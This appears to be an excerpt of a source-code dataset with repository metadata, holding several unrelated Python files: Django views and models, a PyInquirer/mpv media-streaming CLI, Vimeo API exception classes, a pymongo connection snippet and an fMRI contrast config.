if form.is_valid():
form.save()
return redirect('book_list')
else:
form = TripInOrderForm(initial={'order': order})
return render(request, 'create_trips.html', {
'form': form
})
class BookListView(ListView):
model = Order
template_name = 'class_book_list.html'
context_object_name = 'books'
class UploadBookView(CreateView):
model = Book
form_class = BookForm
success_url = reverse_lazy('class_book_list')
template_name = 'upload_book.html'
def home(request):
count = Order.objects.count()
return render(request, 'home.html', {
'count': count
})
def signup(request):
if request.method == 'POST':
form = UserCreationForm(request.POST)
if form.is_valid():
form.save()
return redirect('home')
else:
form = UserCreationForm()
return render(request, 'registration/signup.html', {
'form': form
})
@login_required
def secret_page(request):
return render(request, 'secret_page.html')
class SecretPage(LoginRequiredMixin, TemplateView):
template_name = 'secret_page.html'
| 2,652 | 316 | 320 |
ef0073c050eac7483b356f60945cf3a3fd18fb7f | 194 | py | Python | bldgnorm/__init__.py | ecosang/multifamily_normalization_toy_example | 4af3b4ec74eb757e7c4b3ce078e72049ccc257f2 | [
"MIT"
] | null | null | null | bldgnorm/__init__.py | ecosang/multifamily_normalization_toy_example | 4af3b4ec74eb757e7c4b3ce078e72049ccc257f2 | [
"MIT"
] | null | null | null | bldgnorm/__init__.py | ecosang/multifamily_normalization_toy_example | 4af3b4ec74eb757e7c4b3ce078e72049ccc257f2 | [
"MIT"
] | null | null | null | __all__=["model_utility","model","utility","visualization"]
from bldgnorm.model_utility import *
from bldgnorm.model import *
from bldgnorm.utility import *
from bldgnorm.visualization import * | 32.333333 | 59 | 0.798969 | __all__=["model_utility","model","utility","visualization"]
from bldgnorm.model_utility import *
from bldgnorm.model import *
from bldgnorm.utility import *
from bldgnorm.visualization import * | 0 | 0 | 0 |
454122822f4031c463d21f987722003e44788e9a | 13,595 | py | Python | main.py | hasanpasha/stream-cli | f93c475c253e75943f07cb0f5ca018fae27d3ca7 | [
"Apache-2.0"
] | null | null | null | main.py | hasanpasha/stream-cli | f93c475c253e75943f07cb0f5ca018fae27d3ca7 | [
"Apache-2.0"
] | 16 | 2021-12-08T19:42:21.000Z | 2022-03-16T17:41:47.000Z | main.py | hasanpasha/stream-cli | f93c475c253e75943f07cb0f5ca018fae27d3ca7 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from utils.server_utils import ServerUtils
from utils.video_player import MPVVideoPlayer
from api.constants import Kinds
from PyInquirer import prompt
from typing import List
import os
class Main:
""" main app that run servers and get user commands """
@property
@_media_name.setter
@property
@_media_kind.setter
@property
@_media_season.setter
@property
@_media_episode.setter
# MPV Video Player
def _video_player(self, slug: str, verbose: bool = False) -> None:
"""The video player method uses mpv as default. """
chosed_quality_url: str = self._choose_quality(slug)
trans_files: List = self._get_trans_files(slug)
cmd_args = ['mpv', ]
if chosed_quality_url == None:
return False
cmd_args.append(f"{chosed_quality_url}")
if len(trans_files) >= 1:
for t in trans_files:
cmd_args.append(f"--sub-file={t}")
# no terminal output
cmd_args.append("--no-terminal")
if verbose:
print('$ ' + ' '.join(cmd_args))
# Save screenshots to data folder, with seperating medias
# First make sure the data folder exist, if not make one
if not os.path.exists(Defaults.DATA_FOLDER):
os.mkdir(Defaults.DATA_FOLDER)
# check for screenshots folder existance, or make one
if not os.path.exists(Defaults.SCREENSHOTS_FOLDER):
os.mkdir(Defaults.SCREENSHOTS_FOLDER)
media_screenshots_path = os.path.join(
Defaults.SCREENSHOTS_FOLDER,
self._media_name
)
# check if the playing media have already folder, if not make one
if not os.path.exists(media_screenshots_path):
os.mkdir(media_screenshots_path)
# Set directory, and quality for screenshots
cmd_args.extend([
# The path screenshots saved to
f"--screenshot-directory={media_screenshots_path}",
f"--screenshot-jpeg-quality={100}",
])
# change screenshot filename template, and set media title
if self._media_kind == Kinds.MOVIES:
cmd_args.extend([
f"--screenshot-template=%P", # %p: Current playback time
f"--force-media-title={self._media_name}"
])
elif self._media_kind == Kinds.SERIES:
cmd_args.extend([
f"--screenshot-template=s{self._media_season}-e{self._media_episode}-%P",
f"--force-media-title={self._media_name} s{self._media_season} e{self._media_episode}",
])
# start playing the video
video_player = MPVVideoPlayer()
while True:
video_process: bool = video_player.play_video(cmd_args)
if video_process: # if process returned True
break # end the loop
# On error, Ask to retry playing the video
elif self._continue(msg="Error on playing the videos, Retry? "):
continue
else: # Else end the loop and return to the main loop
break
@property
if __name__ == '__main__':
main_app = Main()
main_app.run() | 32.369048 | 124 | 0.522619 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from utils.server_utils import ServerUtils
from utils.video_player import MPVVideoPlayer
from api.constants import Kinds
from PyInquirer import prompt
from typing import List
import os
class Defaults:
    """Application-wide defaults: server id, data directories and media kind."""
    # Default server id — not referenced elsewhere in this module; presumably
    # consumed by other code. TODO confirm.
    SERVER = 'cinemana'
    # <this file's real directory>/data — realpath() is used so that running
    # the script through a symlink still resolves next to the installed file.
    DATA_FOLDER = os.path.join(
        os.path.split(
            # resolve symlinks so we get the real location of this file
            os.path.realpath(__file__)  # realpath returns the file path, not its directory
        )[0],  # so split it and keep only the directory part
        'data'
    )
    # mpv screenshots are collected under data/screenshots (see Main._video_player).
    SCREENSHOTS_FOLDER = os.path.join(DATA_FOLDER, 'screenshots')
    # Media kind used as the default selection.
    KIND = Kinds.MOVIES
def clear_console():
    """Clear the terminal: 'cls' on Windows/DOS, 'clear' everywhere else."""
    is_windows = os.name in ('nt', 'dos')
    os.system('cls' if is_windows else 'clear')
class Main:
    """Interactive CLI loop: pick a server, search for media, play it with mpv."""

    def __init__(self) -> None:
        # Backend server class; chosen once by choose_server().
        self.server = None
        # Currently-playing media info, populated as the user makes choices.
        self._media_info = {
            'name': None,
            'kind': None,
            'season': None,
            'episode': None,
        }
        clear_console()  # clear the terminal on start
        self.choose_server()  # run once on start to select the server
        # To add args...

    # ---- thin property accessors over the _media_info dict ----
    @property
    def _media_name(self) -> str:
        """Display name of the media currently being handled."""
        return self._media_info['name']
    @_media_name.setter
    def _media_name(self, name: str) -> None:
        self._media_info['name'] = name
    @property
    def _media_kind(self) -> Kinds:
        """Kind of the current media (Kinds.MOVIES or Kinds.SERIES)."""
        return self._media_info['kind']
    @_media_kind.setter
    def _media_kind(self, kind: Kinds) -> None:
        self._media_info['kind'] = kind
    @property
    def _media_season(self) -> int:
        """Season number of the current episode (series only)."""
        return self._media_info['season']
    @_media_season.setter
    def _media_season(self, season: int) -> None:
        self._media_info['season'] = season
    @property
    def _media_episode(self) -> int:
        """Episode number of the current episode (series only)."""
        return self._media_info['episode']
    @_media_episode.setter
    def _media_episode(self, episode: int) -> None:
        self._media_info['episode'] = episode

    def _clear_media_info(self):
        """Reset every field of the currently-playing media info."""
        for key in self._media_info.keys():
            self._media_info[key] = None

    def choose_server(self):
        """Prompt for (or auto-pick) the streaming server and store its class.

        With a single server the prompt is skipped (PyInquirer 'when'), the
        answer dict has no 'server_name' key, and the KeyError branch falls
        back to the only available server.
        """
        if self.server != None:
            return
        su = ServerUtils()
        servers = su.servers_list
        servers_ids = [ dict(name=server['id']) for server in servers ]
        answers = prompt([
            {
                'name': 'server_name',
                'type': 'list',
                'message': 'choose server: ',
                'choices': servers_ids,
                'when': lambda _: len(servers) > 1
            }
        ])
        try:
            cls = su.get_class_by_id(answers['server_name'])
        except KeyError:
            # Prompt was skipped -> no answer key; use the single server.
            print(
                f"Selected {servers_ids[0]['name']}, 'cause there is only one server... ")
            cls = su.get_class_by_id(servers_ids[0]['name'])
        if cls == None:
            print("Error on getting a class... ")
            exit(1)
        self.server = cls

    def run(self, first_run: bool = True) -> None:
        """Main interactive loop: search, pick a title, and play until the user quits."""
        while True:
            # get user commands
            if not first_run:
                clear_console()
                self._clear_media_info()
                # NOTE(review): "Continue: " is passed positionally, so it binds
                # to the ``default`` parameter of _continue(), not ``msg`` — the
                # user sees the default prompt text. Looks like a bug; confirm.
                if not self._continue("Continue: "):
                    break
            first_run = False
            search_options = self._get_search_options
            # Empty search key skips the other prompts ('when'), so short-circuit
            # before touching 'perform_search' (which would then be missing).
            if not search_options['search_key'] or not search_options['perform_search']:
                continue
            # record what kind of media we are about to handle
            self._media_kind = search_options['media_type']
            search_result = self.server.search(
                search_options['search_key'], kind=self._media_kind)
            chosed_media_slug = self._choose_media(search_result)
            if self._media_kind == Kinds.MOVIES:
                self._video_player(chosed_media_slug)
                continue
            elif self._media_kind == Kinds.SERIES:
                episodes = self.server.getEpisodes(chosed_media_slug)
                while True:
                    chosed_episode_slug = self._get_episode_slug(episodes)
                    self._video_player(chosed_episode_slug)
                    if self._continue(msg="do you wnat to play another episode: "):
                        clear_console()
                        continue
                    break
            # since this is the end it will return to
            #+ the beginning of the main loop, just like using continue

    # MPV Video Player
    def _video_player(self, slug: str, verbose: bool = False) -> None:
        """The video player method uses mpv as default. """
        chosed_quality_url: str = self._choose_quality(slug)
        trans_files: List = self._get_trans_files(slug)
        cmd_args = ['mpv', ]
        # NOTE(review): returns False although annotated -> None; callers ignore
        # the return value, so only the annotation is wrong.
        if chosed_quality_url == None:
            return False
        cmd_args.append(f"{chosed_quality_url}")
        if len(trans_files) >= 1:
            for t in trans_files:
                cmd_args.append(f"--sub-file={t}")
        # no terminal output from mpv
        cmd_args.append("--no-terminal")
        if verbose:
            print('$ ' + ' '.join(cmd_args))
        # Save screenshots to the data folder, one sub-folder per media.
        # First make sure the data folder exists, or create it.
        if not os.path.exists(Defaults.DATA_FOLDER):
            os.mkdir(Defaults.DATA_FOLDER)
        # check for the screenshots folder, or create it
        if not os.path.exists(Defaults.SCREENSHOTS_FOLDER):
            os.mkdir(Defaults.SCREENSHOTS_FOLDER)
        media_screenshots_path = os.path.join(
            Defaults.SCREENSHOTS_FOLDER,
            self._media_name
        )
        # check if the playing media already has a folder, or create one
        if not os.path.exists(media_screenshots_path):
            os.mkdir(media_screenshots_path)
        # Set directory and quality for screenshots
        cmd_args.extend([
            # the path screenshots are saved to
            f"--screenshot-directory={media_screenshots_path}",
            f"--screenshot-jpeg-quality={100}",
        ])
        # change the screenshot filename template, and set the media title
        if self._media_kind == Kinds.MOVIES:
            cmd_args.extend([
                f"--screenshot-template=%P", # %P: current playback time
                f"--force-media-title={self._media_name}"
            ])
        elif self._media_kind == Kinds.SERIES:
            cmd_args.extend([
                f"--screenshot-template=s{self._media_season}-e{self._media_episode}-%P",
                f"--force-media-title={self._media_name} s{self._media_season} e{self._media_episode}",
            ])
        # start playing the video
        video_player = MPVVideoPlayer()
        while True:
            video_process: bool = video_player.play_video(cmd_args)
            if video_process: # process reported success
                break # end the loop
            # On error, ask whether to retry playing the video
            elif self._continue(msg="Error on playing the videos, Retry? "):
                continue
            else: # else end the loop and return to the main loop
                break

    def _continue(self, default: bool = True, msg: str = "do you wanna to continue") -> bool:
        """Yes/no confirmation prompt; returns the user's answer."""
        choice = prompt([
            {
                'name': 'continue',
                'type': 'confirm',
                'message': msg,
                'default': default
            }
        ])
        return choice['continue']

    def _get_episode_slug(self, episodes: List) -> str:
        """Group episodes by season, ask for season/episode, and return the slug."""
        # seasons: {season -> {episode -> slug}}, keeping the first slug seen
        seasons = {}
        for s in episodes:
            if s['season'] not in seasons.keys():
                seasons[s['season']] = {}
            this_season = seasons[s['season']]
            if s['episode'] in this_season.keys():
                continue
            this_season[s['episode']] = s['slug']
        season_number = self._media_season = self._get_season_number(seasons)
        episode_number = self._media_episode = self._get_episode_number(seasons, season_number)
        return seasons[season_number][episode_number]

    def _get_trans_files(self, slug: str) -> List:
        """Let the user tick zero or more subtitle tracks; return their file URLs."""
        trans_list = self.server.getTranslations(slug)
        _list = [ dict(
            name=f"{tran['lang'].strip()} ({tran['extension'].strip()})",
            fileURL=tran['fileURL'])
            for tran in trans_list ]
        choose_tran = prompt([
            {
                'name': 'trans',
                'type': 'checkbox',
                'message': 'choose on or more translation file: ',
                'choices': [dict(name=tran['name'])
                            for tran in _list],
                # 'validate': lambda choose_tran: 'You must choose at least one topping.' if len(choose_tran) == 0 else True
            },
        ])
        return [
            i['fileURL'] for i in _list if i['name'] in choose_tran['trans']
        ]

    def _get_season_number(self, seasons: dict) -> str:
        """Ask which season to play; returns the season number as a string.

        With a single season the prompt is skipped ('when' is false), the
        answer dict has no 'season' key, and the KeyError branch returns the
        default (lowest) season number.
        """
        # lowest available season number, as a string
        def default_season() -> str:
            s_l_o_s = sorted([int(v) for v in seasons.keys()])[0]
            return str(s_l_o_s)
        while True:
            chosed_season = prompt([
                {
                    'name': 'season',
                    'type': 'input',
                    'message': f'choose season [{default_season()} - {len(seasons)}]',
                    'when': lambda _: (len(seasons) > 1),
                },
            ])
            try:
                s_n = chosed_season['season']
                # accept only: first season number <= input <= number of seasons
                if int(s_n) >= int(default_season()) and int(s_n) <= len(seasons):
                    return s_n
            except KeyError:
                # prompt skipped (single season) -> return the default
                return default_season()
            except ValueError:
                print("Pleas Enter a number :(")

    def _get_episode_number(self, seasons: dict, season_number) -> str:
        """Ask which episode of ``season_number`` to play; returns it as a string."""
        # lowest available episode number of the chosen season, as a string
        def default_episode() -> str:
            e_l_o_s = sorted([int(v)
                              for v in seasons[season_number].keys()])[0]
            return str(e_l_o_s)
        while True:
            chosed_episode = prompt([
                {
                    'name': 'episode',
                    'type': 'input',
                    # NOTE(review): duplicate 'message' key — this first entry is
                    # dead; the next line overwrites it in the dict literal.
                    'message': 'enter number',
                    'message': f"choose episode [1 - {len(seasons[season_number])}]",
                    'when': lambda _: (len(seasons[season_number]) > 1),
                },
            ])
            try:
                e_n = chosed_episode['episode']
                # accept only: first episode number <= input <= number of episodes
                if (int(e_n) >= int(default_episode()) and
                        int(e_n) <= len((seasons[season_number]))):
                    return e_n
            # the user input is not a number
            except ValueError:
                print("Pleas Enter a number :(")
            # prompt skipped (single episode) -> no answer key
            except KeyError:
                return default_episode()

    def _choose_quality(self, slug: str) -> str:
        """Prompt for a resolution and return the matching video URL.

        Falls off the end (returns None) if nothing matches; _video_player
        checks for that.
        """
        qualities = self.server.getVideos(slug)
        choose_quality = prompt([
            {
                'name': 'quality',
                'type': 'list',
                'message': 'select video quality',
                'choices': [dict(name=video['reso']) for video in qualities]
            }
        ])
        selected_quality = choose_quality['quality']
        for i in qualities:
            if i['reso'] == selected_quality:
                return i['videoURL']

    def _choose_media(self, media_list: List) -> str:
        """Show search results, remember the chosen title's name, return its slug."""
        _list = [ dict(name=f"{media['name']} ({media['year']})", slug=media['slug'])
                  for media in media_list]
        select_media = prompt([
            {
                'name': 'media_choice',
                'message': 'select media: ',
                'type': 'list',
                'choices': _list
            }
        ])
        for i in _list:
            if i['name'] == select_media['media_choice']:
                # remember the display name for later (titles, screenshots)
                self._media_name = i['name']
                return i['slug']

    @property
    def _get_search_options(self) -> dict:
        """Prompt for search key, media type and confirmation; returns the answer dict.

        When 'search_key' is empty the two other questions are skipped
        ('when'), so their keys are absent from the result.
        """
        return prompt([
            {
                'name': 'search_key',
                'type': 'input',
                'message': 'Enter a name to search',
            },
            {
                'name': 'media_type',
                'type': 'list',
                'message': 'select a media type: ',
                'choices': [dict(name=type) for type in [Kinds.MOVIES, Kinds.SERIES]],
                'when': lambda search_choices: search_choices['search_key'],
            },
            {
                'name': 'perform_search',
                'type': 'confirm',
                'message': 'Press any key to perform search or n to reset',
                'default': True,
                'when': lambda search_choices: search_choices['search_key'],
            }
        ])
# Script entry point: constructing Main prompts for a server, then run() starts the loop.
if __name__ == '__main__':
    main_app = Main()
    main_app.run()
0cadcd2fa3cacbc06fab2f302116618a959eb47e | 43 | py | Python | utest/resources/robotdata/resources/res_var_file.py | crylearner/RIDE3X | 767f45b0c908f18ecc7473208def8dc7489f43b0 | [
"ECL-2.0",
"Apache-2.0"
] | 1 | 2017-08-20T14:46:02.000Z | 2017-08-20T14:46:02.000Z | utest/resources/robotdata/resources/res_var_file.py | crylearner/RIDE3X | 767f45b0c908f18ecc7473208def8dc7489f43b0 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | utest/resources/robotdata/resources/res_var_file.py | crylearner/RIDE3X | 767f45b0c908f18ecc7473208def8dc7489f43b0 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | var_from_resource_var_file = 'Some Value'
| 21.5 | 42 | 0.813953 | var_from_resource_var_file = 'Some Value'
| 0 | 0 | 0 |
83718cad3cccf90d4bb8b22c60ce46bec0b7be5f | 129 | py | Python | teste.py | nijuni2022/Projeto-Crud | 4f7d02381a360e5d80d9f1c31ef5a65f69729d62 | [
"MIT"
] | null | null | null | teste.py | nijuni2022/Projeto-Crud | 4f7d02381a360e5d80d9f1c31ef5a65f69729d62 | [
"MIT"
] | null | null | null | teste.py | nijuni2022/Projeto-Crud | 4f7d02381a360e5d80d9f1c31ef5a65f69729d62 | [
"MIT"
] | null | null | null | #from bson.objectid import ObjectId
from pymongo import MongoClient
client= MongoClient("localhost", 27017)
db = client.Dados | 16.125 | 39 | 0.790698 | #from bson.objectid import ObjectId
from pymongo import MongoClient
client= MongoClient("localhost", 27017)
db = client.Dados | 0 | 0 | 0 |
d52a6d9651816badaa28ac2f06b6daa5b87b8d9f | 5,290 | py | Python | vimeo/exceptions.py | mypresences/vimeo.py | 352a1b2e9a0757560d62bb1ac34953b95e4ab3a5 | [
"Apache-2.0"
] | 1 | 2020-12-15T20:45:20.000Z | 2020-12-15T20:45:20.000Z | vimeo/exceptions.py | mypresences/vimeo.py | 352a1b2e9a0757560d62bb1ac34953b95e4ab3a5 | [
"Apache-2.0"
] | null | null | null | vimeo/exceptions.py | mypresences/vimeo.py | 352a1b2e9a0757560d62bb1ac34953b95e4ab3a5 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
class BaseVimeoException(Exception):
"""Base class for Vimeo Exceptions."""
def __init__(self, response, message):
"""Base Exception class init."""
# API error message
self.message = self.__get_message(response)
# HTTP status code
if type(response) is Exception:
self.status_code = 500
elif hasattr(response, 'status_code'):
self.status_code = response.status_code
else:
self.status_code = 500
super(BaseVimeoException, self).__init__(self.message)
class ObjectLoadFailure(Exception):
"""Object Load failure exception."""
def __init__(self, message):
"""Object Load failure exception init."""
super(ObjectLoadFailure, self).__init__(message)
class UploadQuotaExceeded(Exception):
"""Exception for upload quota execeeded."""
def __get_free_space(self, num):
"""Transform bytes in gigabytes."""
return 'Free space quota: %sGb' % (round((num / 1073741824.0), 1))
def __init__(self, free_quota, message):
"""Init method for this subclass of BaseVimeoException."""
message = message + self.__get_free_space(num=free_quota)
super(UploadQuotaExceeded, self).__init__(message)
class UploadAttemptCreationFailure(BaseVimeoException):
"""Exception for upload attempt creation failure."""
def __init__(self, response, message):
"""Init method for this subclass of BaseVimeoException."""
super(UploadAttemptCreationFailure, self).__init__(response, message)
class UploadTicketCreationFailure(BaseVimeoException):
"""Exception for upload ticket creation failure."""
def __init__(self, response, message):
"""Init method for this subclass of BaseVimeoException."""
super(UploadTicketCreationFailure, self).__init__(response, message)
class VideoCreationFailure(BaseVimeoException):
"""Exception for failure on the delete during the upload."""
def __init__(self, response, message):
"""Init method for this subclass of BaseVimeoException."""
super(VideoCreationFailure, self).__init__(response, message)
class VideoUploadFailure(BaseVimeoException):
"""Exception for failures during the actual upload od the file."""
def __init__(self, response, message):
"""Init method for this subclass of BaseVimeoException."""
super(VideoUploadFailure, self).__init__(response, message)
class PictureCreationFailure(BaseVimeoException):
"""Exception for failure on initial request to upload a picture."""
def __init__(self, response, message):
"""Init method for this subclass of BaseVimeoException."""
super(PictureCreationFailure, self).__init__(response, message)
class PictureUploadFailure(BaseVimeoException):
"""Exception for failure on the actual upload of the file."""
def __init__(self, response, message):
"""Init method for this subclass of BaseVimeoException."""
super(PictureUploadFailure, self).__init__(response, message)
class PictureActivationFailure(BaseVimeoException):
"""Exception for failure on activating the picture."""
def __init__(self, response, message):
"""Init method for this subclass of BaseVimeoException."""
super(PictureActivationFailure, self).__init__(response, message)
class TexttrackCreationFailure(BaseVimeoException):
"""Exception for failure on the initial request to upload a text track."""
def __init__(self, response, message):
"""Init method for this subclass of BaseVimeoException."""
super(TexttrackCreationFailure, self).__init__(response, message)
class TexttrackUploadFailure(BaseVimeoException):
"""Exception for failure on the actual upload of the file."""
def __init__(self, response, message):
"""Init method for this subclass of BaseVimeoException."""
super(TexttrackUploadFailure, self).__init__(response, message)
class APIRateLimitExceededFailure(BaseVimeoException):
"""Exception used when the user has exceeded the API rate limit."""
| 34.575163 | 93 | 0.677694 | #!/usr/bin/env python
class BaseVimeoException(Exception):
    """Root of the Vimeo exception hierarchy.

    Derives a human-readable message and an HTTP status code from the object
    handed to the constructor (typically a ``requests`` response, or a bare
    ``Exception``) and exposes them as ``self.message`` / ``self.status_code``.

    NOTE: the ``Exception`` branch reads ``response.message``, which plain
    Python 3 exceptions do not define — it assumes the object carries one.
    """

    def __get_message(self, response):
        """Pull the best available error text out of *response*."""
        if type(response) is Exception:
            return response.message
        payload = None
        try:
            payload = response.json()
        except Exception:
            pass
        if payload:
            # Prefer the API's own error fields when a JSON body is present.
            return payload.get('error') or payload.get('Description')
        if hasattr(response, 'text'):
            fallback = getattr(response, 'message', 'There was an unexpected error.')
            return getattr(response, 'text', fallback)
        return getattr(response, 'message')

    def __init__(self, response, message):
        """Store message and HTTP status derived from *response*."""
        # API error message
        self.message = self.__get_message(response)
        # HTTP status code: 500 unless the response object carries one.
        if type(response) is not Exception and hasattr(response, 'status_code'):
            self.status_code = response.status_code
        else:
            self.status_code = 500
        super(BaseVimeoException, self).__init__(self.message)
class ObjectLoadFailure(Exception):
    """Failure to load an object; carries only a human-readable message."""
    def __init__(self, message):
        """Store *message* as the exception text."""
        super(ObjectLoadFailure, self).__init__(message)
class UploadQuotaExceeded(Exception):
    """Raised when an upload would exceed the account's free-space quota.

    The remaining quota (``free_quota``, in bytes) is appended to the given
    message, rendered in gigabytes with one decimal place.
    """

    def __get_free_space(self, num):
        """Format *num* bytes as a one-decimal gigabyte string."""
        gigabytes = round(num / 1073741824.0, 1)
        return 'Free space quota: %sGb' % gigabytes

    def __init__(self, free_quota, message):
        """Build the final message and initialise the base Exception."""
        full_message = message + self.__get_free_space(num=free_quota)
        super(UploadQuotaExceeded, self).__init__(full_message)
class UploadAttemptCreationFailure(BaseVimeoException):
    """Exception for upload attempt creation failure."""
    def __init__(self, response, message):
        """Forward the HTTP *response* and context *message* to the base class."""
        # NOTE(review): identical to the inherited constructor — could be removed.
        super(UploadAttemptCreationFailure, self).__init__(response, message)
class UploadTicketCreationFailure(BaseVimeoException):
    """Exception for upload ticket creation failure."""
    def __init__(self, response, message):
        """Forward the HTTP *response* and context *message* to the base class."""
        # NOTE(review): identical to the inherited constructor — could be removed.
        super(UploadTicketCreationFailure, self).__init__(response, message)
class VideoCreationFailure(BaseVimeoException):
    """Exception for failure on the delete during the upload."""
    def __init__(self, response, message):
        """Forward the HTTP *response* and context *message* to the base class."""
        # NOTE(review): identical to the inherited constructor — could be removed.
        super(VideoCreationFailure, self).__init__(response, message)
class VideoUploadFailure(BaseVimeoException):
    """Exception for failures during the actual upload of the video file."""
    def __init__(self, response, message):
        """Forward the HTTP *response* and context *message* to the base class."""
        # NOTE(review): identical to the inherited constructor — could be removed.
        super(VideoUploadFailure, self).__init__(response, message)
class PictureCreationFailure(BaseVimeoException):
    """Exception for failure on the initial request to upload a picture."""
    def __init__(self, response, message):
        """Forward the HTTP *response* and context *message* to the base class."""
        # NOTE(review): identical to the inherited constructor — could be removed.
        super(PictureCreationFailure, self).__init__(response, message)
class PictureUploadFailure(BaseVimeoException):
    """Exception for failure on the actual upload of the picture file."""
    def __init__(self, response, message):
        """Forward the HTTP *response* and context *message* to the base class."""
        # NOTE(review): identical to the inherited constructor — could be removed.
        super(PictureUploadFailure, self).__init__(response, message)
class PictureActivationFailure(BaseVimeoException):
    """Exception for failure on activating the picture."""
    def __init__(self, response, message):
        """Forward the HTTP *response* and context *message* to the base class."""
        # NOTE(review): identical to the inherited constructor — could be removed.
        super(PictureActivationFailure, self).__init__(response, message)
class TexttrackCreationFailure(BaseVimeoException):
    """Exception for failure on the initial request to upload a text track."""
    def __init__(self, response, message):
        """Forward the HTTP *response* and context *message* to the base class."""
        # NOTE(review): identical to the inherited constructor — could be removed.
        super(TexttrackCreationFailure, self).__init__(response, message)
class TexttrackUploadFailure(BaseVimeoException):
    """Exception for failure on the actual upload of the text-track file."""
    def __init__(self, response, message):
        """Forward the HTTP *response* and context *message* to the base class."""
        # NOTE(review): identical to the inherited constructor — could be removed.
        super(TexttrackUploadFailure, self).__init__(response, message)
class APIRateLimitExceededFailure(BaseVimeoException):
    """Exception used when the user has exceeded the API rate limit.

    NOTE(review): ``__get_message`` is name-mangled per class, so the base
    constructor calls ``_BaseVimeoException__get_message`` and this override
    is never invoked.  If it *were* invoked, the ``super()`` call below would
    raise AttributeError, because it looks up
    ``_APIRateLimitExceededFailure__get_message`` on the parent.  Renaming the
    hook to single-underscore ``_get_message`` in both classes would fix this.
    """
    def __get_message(self, response):
        # Rate-limit guidance appended to the server-provided message.
        guidelines = 'https://developer.vimeo.com/guidelines/rate-limiting'
        message = super(APIRateLimitExceededFailure, self).__get_message(
            response
        )
        # x-ratelimit-reset tells the client when the quota window re-opens.
        limit_reset_time = response.headers.get('x-ratelimit-reset')
        if limit_reset_time:
            text = '{} \n limit will reset on: {}.\n About this limit: {}'
            message = text.format(
                message,
                limit_reset_time,
                guidelines
            )
        return message
| 1,100 | 0 | 54 |
ebcd35c8dfad509890ef96bd37be1ab49e9e3128 | 77 | py | Python | main.py | akshayvaidya/python-calculator | d07272b8ba8f15ebec0eb516673bde39138d5987 | [
"MIT"
] | null | null | null | main.py | akshayvaidya/python-calculator | d07272b8ba8f15ebec0eb516673bde39138d5987 | [
"MIT"
] | null | null | null | main.py | akshayvaidya/python-calculator | d07272b8ba8f15ebec0eb516673bde39138d5987 | [
"MIT"
] | null | null | null | from calculator import calculator
if __name__=='__main__':
calculator()
| 15.4 | 33 | 0.753247 | from calculator import calculator
if __name__=='__main__':
calculator()
| 0 | 0 | 0 |
89a146782b6ab2661257124e9041ce278d8d11af | 772 | py | Python | experiment_files/punch-cpe_cuestim.py | mwaskom/Waskom_CerebCortex_2017 | 1f582917258afbe234f1e72d4eabb8dc8c719f41 | [
"Unlicense"
] | 12 | 2017-09-15T15:32:15.000Z | 2021-06-13T04:29:04.000Z | experiment_files/punch-cpe_cuestim.py | WagnerLabPapers/Waskom_CerebCortex_InPress | e5a7de82f47362b909478d842673bd364b8d918e | [
"Unlicense"
] | null | null | null | experiment_files/punch-cpe_cuestim.py | WagnerLabPapers/Waskom_CerebCortex_InPress | e5a7de82f47362b909478d842673bd364b8d918e | [
"Unlicense"
] | 5 | 2017-09-20T00:20:15.000Z | 2022-03-21T11:28:46.000Z | """
Parametric design with CPE modeled separately for cue and stimulus periods.
"""
# Identifier for this model design.
design_name = "cpe_cuestim"
# Regressor/condition names entering the design.
condition_names = ["cue", "stim",
                   "cpe_cue", "cpe_stim",
                   "error", "response_time"]
# Presumably: include temporal-derivative regressors and PCA-reduce the
# confounds — TODO confirm against the analysis package that reads this file.
temporal_deriv = True
confound_pca = True
# (name, condition list, weight list) triples defining each contrast.
contrasts = [
    ("cue_neg", ["cue"], [-1]),
    ("stim_neg", ["stim"], [-1]),
    ("cpe_cue_neg", ["cpe_cue"], [-1]),
    ("cpe_stim_neg", ["cpe_stim"], [-1]),
    ("cue-stim", ["cue", "stim"], [1, -1]),
    ("stim-cue", ["cue", "stim"], [-1, 1]),
    ("cpe_cue-stim", ["cpe_cue", "cpe_stim"], [1, -1]),
    ("cpe_stim-cue", ["cpe_cue", "cpe_stim"], [-1, 1]),
    ]
# assumes: surface sampling range and smoothing kernel size — verify units
# with the consuming pipeline.
sampling_range = (.5, .5, 1)
surf_smooth = 6
| 30.88 | 75 | 0.472798 | """
Parametric design with CPE modeled separately for cue and stimulus periods.
"""
design_name = "cpe_cuestim"
condition_names = ["cue", "stim",
"cpe_cue", "cpe_stim",
"error", "response_time"]
temporal_deriv = True
confound_pca = True
contrasts = [
("cue_neg", ["cue"], [-1]),
("stim_neg", ["stim"], [-1]),
("cpe_cue_neg", ["cpe_cue"], [-1]),
("cpe_stim_neg", ["cpe_stim"], [-1]),
("cue-stim", ["cue", "stim"], [1, -1]),
("stim-cue", ["cue", "stim"], [-1, 1]),
("cpe_cue-stim", ["cpe_cue", "cpe_stim"], [1, -1]),
("cpe_stim-cue", ["cpe_cue", "cpe_stim"], [-1, 1]),
]
sampling_range = (.5, .5, 1)
surf_smooth = 6
| 0 | 0 | 0 |
44a6bf400cccb033ac68d44f5d1b8e4fde08245c | 972 | py | Python | users/models.py | olubiyiontheweb/dockerized_admin_dashboard | 50e224550f66adabdfe1bc3867fb68d419d9c99b | [
"MIT"
] | null | null | null | users/models.py | olubiyiontheweb/dockerized_admin_dashboard | 50e224550f66adabdfe1bc3867fb68d419d9c99b | [
"MIT"
] | null | null | null | users/models.py | olubiyiontheweb/dockerized_admin_dashboard | 50e224550f66adabdfe1bc3867fb68d419d9c99b | [
"MIT"
] | null | null | null | from django.db import models
from django.contrib.auth.models import AbstractUser, AbstractBaseUser
# Create your models here.
| 32.4 | 72 | 0.75823 | from django.db import models
from django.contrib.auth.models import AbstractUser, AbstractBaseUser
# Create your models here.
class Permission(models.Model):
    """A named permission; attached to roles via Role.permissions."""
    name = models.CharField(max_length=200)
class Role(models.Model):
    """A named role grouping a set of permissions."""
    name = models.CharField(max_length=200)
    # Many-to-many: a role holds any number of permissions and vice versa.
    permissions = models.ManyToManyField(Permission)
class User(AbstractUser):
    """Custom user that authenticates by e-mail and carries an optional Role.

    NOTE(review): most fields below (username, first_name, last_name, email,
    password, is_superuser, is_staff, is_active, date_joined) shadow the ones
    AbstractUser already provides; in particular ``username`` loses its
